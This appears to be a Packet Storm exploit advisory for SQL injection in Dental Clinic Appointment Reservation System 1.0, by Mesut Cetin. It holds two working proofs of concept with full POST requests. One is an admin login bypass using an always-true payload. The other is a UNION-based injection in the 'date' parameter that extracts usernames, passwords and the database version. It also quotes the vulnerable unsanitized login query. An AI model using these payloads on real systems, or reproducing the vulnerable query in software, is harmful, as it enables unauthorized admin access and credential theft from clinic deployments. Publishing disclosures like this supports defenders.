exploit the possibilities

Dental Clinic Appointment Reservation System 1.0 SQL Injection

Dental Clinic Appointment Reservation System 1.0 SQL Injection
Posted May 13, 2021
Authored by Mesut Cetin

Dental Clinic Appointment Reservation System version 1.0 suffers from multiple remote SQL injection vulnerabilities with one of them allowing for authentication bypass.

tags | exploit, remote, vulnerability, sql injection
MD5 | 590039c72fd98d00add5038df52eb7a0

Dental Clinic Appointment Reservation System 1.0 SQL Injection

Change Mirror Download
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)
# Date: 12.05.2021
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Ubuntu 18.04 TLS

# Description:
# Attacker can bypass admin login page due to unsanitized user input and access internal contents
# vulnerable code in /admin/index.php, line 34:
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
# payload: admin' or '1' = '1 -- -

# Proof of concept:
http://localhost/admin/index.php

POST /admin/index.php HTTP/1.1
Host: localhost
Content-Length: 54
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; E6653 Build/32.2.A.0.253) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=3cjdtku76ggasqei49gng91p3p
dnt: 1
sec-gpc: 1
Connection: close

username=admin'+or+'1'%3d1+--+-&password=test&submit=

------
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - 'date' UNION based SQL Injection (Authenticated)
# Date: 12.05.2021
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Ubuntu 18.04 TLS

# Description:
# the 'date' POST parameter is vulnerable to UNION-based SQL Injection
# Attacker can use it to retrieve sensitive data like usernames, passwords, versions, etc.
# payload: ' UNION SELECT NULL,NULL,@@version,username,password,NULL FROM users -- -

# Proof of concept:
http://localhost/admin/sort_date.php

POST /admin/sort_date.php HTTP/1.1
Host: localhost
Content-Length: 84
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/admin/sort_date.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=3cjdtku76ggasqei49gng91p3p
dnt: 1
sec-gpc: 1
Connection: close

date='+UNION+SELECT+NULL,NULL,@@version,username,password,NULL+FROM+users+--+-&sort=

Login or Register to add favorites

File Archive:

June 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    35 Files
  • 2
    Jun 2nd
    14 Files
  • 3
    Jun 3rd
    40 Files
  • 4
    Jun 4th
    22 Files
  • 5
    Jun 5th
    1 Files
  • 6
    Jun 6th
    1 Files
  • 7
    Jun 7th
    19 Files
  • 8
    Jun 8th
    14 Files
  • 9
    Jun 9th
    39 Files
  • 10
    Jun 10th
    20 Files
  • 11
    Jun 11th
    22 Files
  • 12
    Jun 12th
    2 Files
  • 13
    Jun 13th
    1 Files
  • 14
    Jun 14th
    32 Files
  • 15
    Jun 15th
    34 Files
  • 16
    Jun 16th
    9 Files
  • 17
    Jun 17th
    33 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close